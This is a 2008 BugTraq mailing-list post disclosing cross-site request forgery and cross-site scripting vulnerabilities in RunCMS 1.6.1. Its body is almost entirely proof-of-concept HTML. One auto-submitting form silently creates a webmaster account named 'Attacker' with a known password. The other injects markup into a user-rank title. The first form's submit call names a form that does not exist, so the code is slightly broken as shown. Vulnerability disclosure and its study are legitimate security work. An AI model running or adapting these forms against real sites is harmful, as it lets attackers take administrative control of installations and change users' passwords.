BugTraq
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties Feb 16 2008 08:30PM
nbbn gmx net
###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilties by NBBN
###################################################################

[b]
1) Create Webmaster (admin) XSRF Vulnerability[/b]
<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack (at) attack (dot) com [email concealed]">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">

Also with XSRF an attacker can update the profile of all users. He can change
the password etc...

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50"
value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus